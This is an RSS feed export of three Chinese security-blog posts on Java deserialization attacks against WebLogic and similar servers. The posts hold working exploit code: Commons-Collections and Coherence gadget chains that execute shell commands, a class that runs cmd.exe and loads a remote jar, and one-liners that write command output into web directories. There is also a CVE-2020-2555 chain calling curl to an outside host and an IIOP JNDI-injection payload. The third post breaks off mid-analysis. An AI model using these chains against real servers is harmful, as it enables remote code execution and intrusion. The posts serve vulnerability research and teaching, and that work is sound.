<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>weblogic &#8211; ChaBug安全</title>
	<atom:link href="/tags/weblogic/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 15 May 2020 16:16:24 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>Java 反序列化回显的多种姿势</title>
		<link>/audit/1777.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 15 May 2020 16:16:24 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1777</guid>

					<description><![CDATA[聊一聊反序列化回显的问题 写在文前 在研究weblogic、fastjson、shiro反序列化漏洞时，多次遇到了回显问题，本文将从以下几种角度出发来分别探讨反序列化回显的问题，也...]]></description>
										<content:encoded><![CDATA[<p>聊一聊<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>回显的问题</p>
<h2>写在文前</h2>
<p>在研究<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>、fastjson、shiro反序列化漏洞时，多次遇到了回显问题，本文将从以下几种角度出发来分别探讨反序列化回显的问题，也感谢各位师傅们的反序列化回显研究。</p>
<ol>
<li>defineClass</li>
<li>RMI绑定实例</li>
<li>URLClassLoader抛出异常</li>
<li>中间件</li>
<li>写文件css、js</li>
<li>dnslog</li>
</ol>
<h2>defineClass</h2>
<p>先说defineClass这个东西是因为下面的几种方式都是在其基础上进行改进。defineClass归属于ClassLoader类，其主要作用就是使用编译好的字节码就可以定义一个类。</p>
<p>形如</p>
<pre><code class="language-java line-numbers">package com.test.ClassLoader;

import java.lang.reflect.Method;

public class MyClassLoader extends ClassLoader {
    private static String myClassName = "com.test.ClassLoader.HelloWorld";
    private static byte[] bs = new byte[]{
        -54, -2, -70, -66, 0, 0, 0, 52, 0, 36, 10, 0, 7, 0, 22, 9, 0, 23, 0, 24, 8, 0, 25, 10, 0, 26, 0, 27, 8, 0, 19, 7, 0, 28, 7, 0, 29, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 33, 76, 99, 111, 109, 47, 116, 101, 115, 116, 47, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 47, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 59, 1, 0, 4, 109, 97, 105, 110, 1, 0, 22, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 97, 114, 103, 115, 1, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 4, 116, 101, 115, 116, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 15, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 46, 106, 97, 118, 97, 12, 0, 8, 0, 9, 7, 0, 30, 12, 0, 31, 0, 32, 1, 0, 5, 72, 101, 108, 108, 111, 7, 0, 33, 12, 0, 34, 0, 35, 1, 0, 31, 99, 111, 109, 47, 116, 101, 115, 116, 47, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 47, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 3, 111, 117, 116, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 1, 0, 7, 112, 114, 105, 110, 116, 108, 110, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 0, 33, 0, 6, 0, 7, 0, 0, 0, 0, 0, 3, 0, 1, 0, 8, 0, 9, 0, 1, 0, 10, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 11, 0, 0, 0, 6, 0, 1, 0, 0, 0, 3, 0, 12, 0, 
0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 13, 0, 14, 0, 0, 0, 9, 0, 15, 0, 16, 0, 1, 0, 10, 0, 0, 0, 55, 0, 2, 0, 1, 0, 0, 0, 9, -78, 0, 2, 18, 3, -74, 0, 4, -79, 0, 0, 0, 2, 0, 11, 0, 0, 0, 10, 0, 2, 0, 0, 0, 5, 0, 8, 0, 6, 0, 12, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 17, 0, 18, 0, 0, 0, 9, 0, 19, 0, 9, 0, 1, 0, 10, 0, 0, 0, 37, 0, 2, 0, 0, 0, 0, 0, 9, -78, 0, 2, 18, 5, -74, 0, 4, -79, 0, 0, 0, 1, 0, 11, 0, 0, 0, 10, 0, 2, 0, 0, 0, 8, 0, 8, 0, 9, 0, 1, 0, 20, 0, 0, 0, 2, 0, 21,
    };

    public static void main(String[] args) {
        try {
            MyClassLoader loader = new MyClassLoader();
            Class helloClass = loader.loadClass(myClassName);
            Object obj = helloClass.newInstance();
            Method method = obj.getClass().getMethod("test");
            method.invoke(null);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    protected Class&lt;?&gt; findClass(String name) throws ClassNotFoundException {
        if (name == myClassName) {
            System.out.println("加载" + name + "类");
            return defineClass(myClassName, bs, 0, bs.length);
        }
        return super.findClass(name);
    }

}
</code></pre>
<h2>RMI绑定实例</h2>
<p>之前写过一篇 <a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7228">《Weblogic使用ClassLoader和RMI来回显命令执行结果》</a>，其中提到了使用commons-collection反射调用defineClass，通过defineClass定义的恶意命令执行字节码来绑定RMI实例，接着通过RMI调用绑定的实例拿到回显结果。其中最关键的代码就下面几行</p>
<pre><code class="language-java line-numbers">// common-collection1 构造transformers 定义自己的RMI接口
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(DefiningClassLoader.class),
        new InvokerTransformer("getDeclaredConstructor",
            new Class[] { Class[].class }, new Object[] { new Class[0] }),
        new InvokerTransformer("newInstance",
            new Class[] { Object[].class },
            new Object[] { new Object[0] }),
        new InvokerTransformer("defineClass",
            new Class[] { String.class, byte[].class },
            new Object[] { className, classBytes }),
        new InvokerTransformer("getMethod",
            new Class[] { String.class, Class[].class },
            new Object[] { "main", new Class[] { String[].class } }),
        new InvokerTransformer("invoke",
            new Class[] { Object.class, Object[].class },
            new Object[] { null, new Object[] { null } }),
        new ConstantTransformer(new HashSet())
};
</code></pre>
<p>使用cc链进行反射调用，其中className为恶意命令执行类，形如<code>com.test.payload.RemoteImpl</code>，继承自Remote接口的实现，classBytes为该类字节码数组，将该类对象绑定在<code>rmi://127.0.0.1:1099/Hello</code>实例上，进而通过JNDI调用Hello即可。</p>
<h2>URLClassLoader抛出异常</h2>
<p>通过将回显结果封装到异常信息抛出拿到回显。</p>
<p>首先写一下执行命令的类</p>
<pre><code class="language-java line-numbers">import java.io.*;
import java.nio.charset.Charset;

public class ProcessExec {
    public ProcessExec(String cmd) throws Exception {
        InputStream stream = (new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd})).start().getInputStream();
        InputStreamReader streamReader = new InputStreamReader(stream, Charset.forName("gbk"));
        BufferedReader bufferedReader = new BufferedReader(streamReader);
        StringBuffer buffer = new StringBuffer();
        String line = null;

        while((line = bufferedReader.readLine()) != null) {
            buffer.append(line).append("\n");
        }

        throw new Exception(buffer.toString());
    }
}
</code></pre>
<p>打jar包</p>
<pre><code class="language-java line-numbers">javac ProcessExec.java
jar -cvf p.jar ProcessExec.class
</code></pre>
<p>使用URLClassLoader加载jar获得回显</p>
<pre><code class="language-java line-numbers">package payload;

import java.lang.reflect.Constructor;
import java.net.URL;
import java.net.URLClassLoader;

public class URLClassloader {
    public static void main(String[] args) throws Exception {
        URL url = new URL("http://127.0.0.1/p.jar");
        URL[] urls = {url};
        URLClassLoader urlClassLoader = URLClassLoader.newInstance(urls);
        Constructor&lt;?&gt; processExec = urlClassLoader.loadClass("ProcessExec").getConstructor(String.class);
        processExec.newInstance("ipconfig");

    }
}
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200516008124.png" alt="image.png" /></p>
<p>使用URLClassLoader的部份可以通过cc链反射去做</p>
<pre><code class="language-java line-numbers">package payload;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

class CommonsCollections5URLClassLoader {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(URLClassLoader.class),
                // 获取构造方法
                new InvokerTransformer("getConstructor",
                        new Class[]{Class[].class},
                        new Object[]{new Class[]{java.net.URL[].class}}),
                // new实例并赋值url
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1/p.jar")}}}),
                // loadClass加载ProcessExec
                new InvokerTransformer("loadClass", new Class[]{String.class}, new Object[]{"ProcessExec"}),
                // 获取ProcessExec的构造方法
                new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{String.class}}),
                // 实例化ProcessExec
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new String[]{"ipconfig"}})

        };
        Transformer chain = new ChainedTransformer(transformers);
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, chain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(entry);
        Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException, entry);

        serialize(badAttributeValueExpException);
        deserialize();
    }

    public static void serialize(Object obj) {
        try {
            ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("test.ser"));
            os.writeObject(obj);
            os.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void deserialize() {
        try {
            ObjectInputStream is = new ObjectInputStream(new FileInputStream("test.ser"));
            is.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p>这个例子大多出现在jboss和fastjson中，灵活使用。</p>
<h2>中间件回显</h2>
<p>中间件而言多数重写了thread类，在thread中保存了req和resp，可以通过获取当前线程，在resp中写入回显结果</p>
<p>这种方法前几天在先知上有很多针对tomcat无回显的文章，为各位师傅的文章画一下时间线：</p>
<ol>
<li><a class="wp-editor-md-post-content-link" href="https://www.anquanke.com/post/id/198886">《基于内存 Webshell 的无文件攻击技术研究》</a> 主要应用于Spring</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7307">《linux下java反序列化通杀回显方法的低配版实现》</a> 将回显结果写入文件操作符</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7348">《Tomcat中一种半通用回显方法》</a> 将执行命令的结果存入tomcat的response返回 shiro无法回显</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7388">《基于tomcat的内存 Webshell 无文件攻击技术》</a> 动态注册filter实现回显 shiro无法回显</li>
<li><a class="wp-editor-md-post-content-link" href="https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&amp;mid=2651374294&amp;idx=3&amp;sn=82d050ca7268bdb7bcf7ff7ff293d7b3">《基于全局储存的新思路 | Tomcat的一种通用回显方法研究》</a> 通过Thread.currentThread.getContextClassLoader() 拿到request、response回显 tomcat7中获取不到StandardContext</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7535">《tomcat不出网回显连续剧第六集》</a> 直接从Register拿到process对应的req</li>
</ol>
<p>不再赘述了，具体实现文章都有了。值得一提的思路可能就是反序列化不仅仅可以回显，也可以配合反射和字节码动态注册servlet实现无内存webshell。</p>
<p>在weblogic中也有resp回显，具体代码在 <a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/5299">《weblogic_2019_2725poc与回显构造》</a> lufei师傅已经给出来了</p>
<p>weblogic10.3.6</p>
<pre><code class="language-java line-numbers">String lfcmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("lfcmd");
weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
outputStream.writeStream(new weblogic.xml.util.StringInputStream(lfcmd));
outputStream.flush();
response.getWriter().write("");
</code></pre>
<p>weblogic12.1.3</p>
<pre><code class="language-java line-numbers">java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream("xxxxxx"));
</code></pre>
<h2>写文件</h2>
<p>通过搜索特殊文件路径直接写入web可访问的目录，要熟悉常用中间件容器的目录结构，比如在我web目录有一个特殊的test.html</p>
<p>linux用bash</p>
<pre><code class="language-bash line-numbers">// 进入test.html的根目录并执行id命令写入1.txt
cd $(find -name "test.html" -type f -exec dirname {} \; | sed 1q) &amp;&amp; echo `id` &gt; 1.txt
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200516003808.png" alt="image.png" /></p>
<p>windows的powershell</p>
<pre><code class="language-powershell line-numbers">$file = Get-ChildItem -Path . -Filter test.html -recurse -ErrorAction SilentlyContinue;$f = -Join($file.DirectoryName,"/a.txt");echo 222 |Out-File $f
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200516009199.png" alt="image.png" /></p>
<h2>dnslog</h2>
<p>这个就不提了，技巧的话就是用powershell或者base64命令编码一下，避免特殊字符，还有就是挑小众的dnslog平台。</p>
<h2>参考</h2>
<ol>
<li>https://www.cnblogs.com/afanti/p/12502145.html</li>
<li>https://xz.aliyun.com/t/5299</li>
<li>https://<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>sec.org/javase/ClassLoader/</li>
<li>https://www.cnblogs.com/ph4nt0mer/p/12802851.html</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Weblogic CVE-2020-2555 反序列化RCE EXP构造</title>
		<link>/audit/1334.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 11 Mar 2020 03:22:42 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1334</guid>

					<description><![CDATA[Weblogic 简直是个无底洞. 2020.03.06 早上4点，看到了清水川崎师傅推送了Weblogic CVE-2020-2555的通告，在推特上搜了一波，发现有详细的分析文...]]></description>
										<content:encoded><![CDATA[<p>Weblogic 简直是个无底洞.<br />
<span id="more-1334"></span></p>
<p>2020.03.06 早上4点，看到了清水川崎师傅推送了Weblogic CVE-2020-2555的通告，在推特上搜了一波，发现有详细的分析文章，遂有此文。</p>
<h2>漏洞分析</h2>
<p>个人研究，没钱买补丁，这里借用<a class="wp-editor-md-post-content-link" href="https://www.zerodayinitiative.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server">Zero Day</a>的图。</p>
<p><img src="/wp-content/uploads/2020/03/20200310118799-1.png" alt="image" /></p>
<p>补丁中将<code>LimitFilter</code>类的<code>toString()</code>方法中的<code>extract()</code>方法调用全部移除，而我们需要知道在<a class="wp-editor-md-post-content-link" href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections5.java">CommonsCollections5</a>中可以利用<code>BadAttributeValueExpException</code>来调用任意类的<code>toString()</code>方法。</p>
<p>接着来看下没打补丁之前<code>LimitFilter</code>类的<code>toString()</code>方法。</p>
<pre><code class="language-java ">public String toString() {
    StringBuilder sb = new StringBuilder("LimitFilter: (");
    sb.append(this.m_filter).append(" [pageSize=").append(this.m_cPageSize).append(", pageNum=").append(this.m_nPage);
    if (this.m_comparator instanceof ValueExtractor) {
        ValueExtractor extractor = (ValueExtractor)this.m_comparator;
        sb.append(", top=").append(extractor.extract(this.m_oAnchorTop)).append(", bottom=").append(extractor.extract(this.m_oAnchorBottom));
    } else if (this.m_comparator != null) {
        sb.append(", comparator=").append(this.m_comparator);
    }

    sb.append("])");
    return sb.toString();
}
</code></pre>
<p><code>toString()</code>中会将<code>this.m_oAnchorTop</code>和<code>this.m_oAnchorBottom</code>作为参数传入<code>ValueExtractor.extract()</code>，补丁移除了<code>extractor.extract()</code>操作，跟进<code>extract()</code>看下，发现<code>extract()</code>只是一个抽象方法，并没有实现，那说明<code>extract()</code>在<code>ValueExtractor</code>的子类中可以利用。因为是<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>，所以我们只需要在<code>ValueExtractor</code>子类中找到实现了<code>Serializable</code>或者<code>ExternalizableLite</code>反序列化接口并且有<code>extract()</code>的方法。最终在<code>com.tangosol.util.extractor.ReflectionExtractor#extract()</code>找到了反射任意方法调用。</p>
<pre><code class="language-java ">public E extract(T oTarget) {
    if (oTarget == null) {
        return null;
    } else {
        Class clz = oTarget.getClass();

        try {
            Method method = this.m_methodPrev;
            if (method == null || method.getDeclaringClass() != clz) {
                this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);
            }

            return method.invoke(oTarget, this.m_aoParam);
        } catch (NullPointerException var4) {
            throw new RuntimeException(this.suggestExtractFailureCause(clz));
        } catch (Exception var5) {
            throw ensureRuntimeException(var5, clz.getName() + this + '(' + oTarget + ')');
        }
    }
}
</code></pre>
<p>到现在为止我们可以传入一个<code>Runtime.getRuntime()</code>的<code>oTarget</code>，将<code>this.m_methodPrev</code>赋值为exec，然后<code>this.m_aoParam</code>就是我们的命令参数，就可以RCE了。而对于反序列化而言，我们需要继续构建对象，让他自己执行<code>Runtime.getRuntime()</code>，这里很像cc链中的<code>InvokerTransformer.transform()</code>，那有没有像cc链中的<code>ChainedTransformer</code>类呢。遂找到了<code>com.tangosol.util.extractor.ChainedExtractor#extract()</code></p>
<pre><code class="language-java ">@JsonbCreator
public ChainedExtractor(@JsonbProperty("extractors") ValueExtractor[] aExtractor) {
    super(aExtractor);
    this.m_nTarget = this.computeTarget();
}
public E extract(Object oTarget) {
    ValueExtractor[] aExtractor = this.getExtractors();
    int i = 0;

    for(int c = aExtractor.length; i &lt; c &amp;&amp; oTarget != null; ++i) {
        oTarget = aExtractor[i].extract(oTarget);
    }

    return oTarget;
}
</code></pre>
<p>和cc5的构造很像，我们一步一步构造下</p>
<pre><code class="language-java ">// Runtime.class.getRuntime()
ReflectionExtractor extractor1 = new ReflectionExtractor(
    "getMethod",
    new Object[]{"getRuntime", new Class[0]}

);

// get invoke() to execute exec()
ReflectionExtractor extractor2 = new ReflectionExtractor(
    "invoke",
    new Object[]{null, new Object[0]}

);

// invoke("exec","calc")
ReflectionExtractor extractor3 = new ReflectionExtractor(
    "exec",
    new Object[]{new String[]{"/bin/bash", "-c", "curl http://172.16.1.1/success"}}
);
</code></pre>
<p>首先先构造三个<code>ReflectionExtractor</code>对象来调用反射拿到我们想要的，然后把他放到<code>ReflectionExtractor</code>数组中，将数组通过构造函数赋值给<code>ChainedExtractor</code>。</p>
<pre><code class="language-java ">ReflectionExtractor[] extractors = {
    extractor1,
    extractor2,
    extractor3,
};

ChainedExtractor chainedExtractor = new ChainedExtractor(extractors);
</code></pre>
<p>那到目前为止，只要反序列化执行了<code>chainedExtractor.extract()</code>就可以造成<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>。而前文所说，<code>toString()</code>中是执行了<code>extract()</code>的，所以我们将<code>chainedExtractor</code>通过反射赋值给<code>limitFilter</code>对象。然后通过<code>BadAttributeValueExpException</code>触发<code>limitFilter</code>对象的<code>toString()</code>，进而触发<code>extract()</code>一步一步调用<code>method.invoke()</code>，继而通过反射拿到<code>Runtime.getRuntime().exec("")</code>，达成RCE。</p>
<h2>坑</h2>
<ol>
<li><code>coherence.jar</code>要使用和目标版本一致的，不然会有<code>serialVersionUID</code>不一致的问题。</li>
<li><code>BadAttributeValueExpException</code>对jdk的版本有要求。具体看<a class="wp-editor-md-post-content-link" href="https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70">这里</a></li>
</ol>
<h2>漏洞利用</h2>
<p>https://github.com/Y4er/CVE-2020-2555</p>
<p><img src="/wp-content/uploads/2020/03/20200310119395-1.gif" alt="" /></p>
<h2>参考</h2>
<ol>
<li>https://www.zerodayinitiative.com/blog/2020/3/5/<span class="wpcom_tag_link"><a href="/tags/cve" title="cve" target="_blank">cve</a></span>-2020-2555-rce-through-a-deserialization-bug-in-oracles-<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>-server</li>
<li>https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR76</li>
<li>https://github.com/frohoff/ysoserial/blob/master/src/main/<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>/ysoserial/payloads/CommonsCollections5.java</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>[内置工具]Weblogic CVE-2020-2551 IIOP协议反序列化RCE</title>
		<link>/audit/1282.html</link>
					<comments>/audit/1282.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 28 Feb 2020 09:46:09 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[IIOP]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[RMI]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1282</guid>

					<description><![CDATA[IIOP协议导致的反序列化。 环境 weblogic10.3.6+jdk1.6 idea+jdk1.8+jdk1.6 IIOP IIOP，Internet Inter-ORB Pr...]]></description>
										<content:encoded><![CDATA[<p><span class="wpcom_tag_link"><a href="/tags/iiop" title="IIOP" target="_blank">IIOP</a></span>协议导致的<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>。<br />
<span id="more-1282"></span></p>
<h2>环境</h2>
<p><span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>10.3.6+jdk1.6<br />
idea+jdk1.8+jdk1.6</p>
<h2>IIOP</h2>
<p>IIOP，Internet Inter-ORB Protocol(互联网内部对象请求代理协议)，它是一个用于CORBA 2.0及兼容平台上的协议；用来在CORBA对象请求代理之间交流的协议。Java中使得程序可以和其他语言的CORBA实现互操作性的协议。</p>
<p><span class="wpcom_tag_link"><a href="/tags/rmi" title="RMI" target="_blank">RMI</a></span>-IIOP出现以前，只有RMI和CORBA两种选择来进行分布式程序设计，二者之间不能协作。RMI-IIOP综合了RMI 和CORBA的优点，克服了他们的缺点，使得程序员能更方便的编写分布式程序设计，实现分布式计算。RMI-IIOP综合了RMI的简单性和CORBA的多语言性兼容性，RMI-IIOP克服了RMI只能用于Java的缺点和CORBA的复杂性。</p>
<p>在Weblogic中，默认启用了IIOP，而IIOP的传输也是通过序列化和反序列化的形式来进行的。在Weblogic中RMI-IIOP模型可以借用奇安信观星实验室的一张图来说明</p>
<p><img src="https://y4er.com/img/uploads/20200228171035.png" alt="image" /></p>
<h2>IIOP样例</h2>
<p>先来看一个简单的RMI-IIOP样例，具体代码可以看 https://github.com/longofo/rmi-jndi-ldap-jrmp-jmx-jms</p>
<pre><code class="language-java ">package com.longofo.example;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Hashtable;

public class HelloServer {
    public final static String JNDI_FACTORY = "com.sun.jndi.cosnaming.CNCtxFactory";

    public static void main(String[] args) {
        try {
            System.setProperty("java.rmi.server.codebase", "http://127.0.0.1:8000/");
            //实例化Hello servant
            HelloImpl helloRef = new HelloImpl();

            //使用JNDI在命名服务中发布引用
            InitialContext initialContext = getInitialContext("iiop://127.0.0.1:1050");
            initialContext.rebind("HelloService", helloRef);

            System.out.println("Hello Server Ready...");

            Thread.currentThread().join();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
}
</code></pre>
<p>Server端通过InitialContext拿到上下文，然后注册一个HelloService对应helloRef引用，而HelloImpl又实现了HelloInterface接口，其中有一个sayHello方法并且继承<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.rmi.Remote抛出java.rmi.RemoteException，这部分其实和RMI是大同小异的，在我的其他文章中介绍过了RMI，这里不再赘述。</p>
<h2>漏洞分析</h2>
<p>现在我们来看这个漏洞。IIOP传输的过程中会自动序列化和反序列化，那么我们可以通过IIOP向服务器7001端口发送一个恶意的序列化对象，达到RCE。</p>
<p>发送恶意序列化对象的过程，其实就是bind的过程，由此我们可以构造请求</p>
<pre><code class="language-java ">Hashtable&lt;String, String&gt; env = new Hashtable&lt;String, String&gt;();
// add wlsserver/server/lib/weblogic.jar to classpath,else will error.
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put("java.naming.provider.url", rhost);
Context context = new InitialContext(env);
// get Object to Deserialize
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
jtaTransactionManager.setUserTransactionName(rmiurl);

Remote remote = createMemoitizedProxy(createMap("pwned"+System.nanoTime(), jtaTransactionManager), Remote.class);
context.rebind("Y4er"+System.nanoTime(), remote);
</code></pre>
<p>你肯定疑惑JtaTransactionManager和weblogic.jndi.WLInitialContextFactory是从哪来的？</p>
<ol>
<li>JtaTransactionManager是spring爆出的一个可以JNDI注入的类，在weblogic中也存在。</li>
<li>weblogic.jndi.WLInitialContextFactory 是weblogic的JNDI工厂类。</li>
</ol>
<p>国际惯例，跟一下流程，IIOP解析数据流的部分看不懂不跟了，从IIOP开始反序列化对象开始</p>
<p>E:/sou<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>/java/Weblogic/src/main/resources/lib/modules/weblogic.jar!/weblogic/iiop/IIOPInputStream.class:1725<br />
<img src="/wp-content/uploads/2020/02/20200228174070.png" alt="image" /></p>
<p>此时var2是序列化传入的<code>com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager</code>，跟进readValue()<br />
<img src="/wp-content/uploads/2020/02/20200228172827.png" alt="image" /></p>
<p>跟进readValueData()，判断是否有readObject方法之后进入自身的readObject()，也就是<code>com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager</code>的readObject</p>
<p><img src="/wp-content/uploads/2020/02/20200228175633.png" alt="image" /></p>
<p>然后通过反射调用JtaTransactionManager的readObject()，跟进<br />
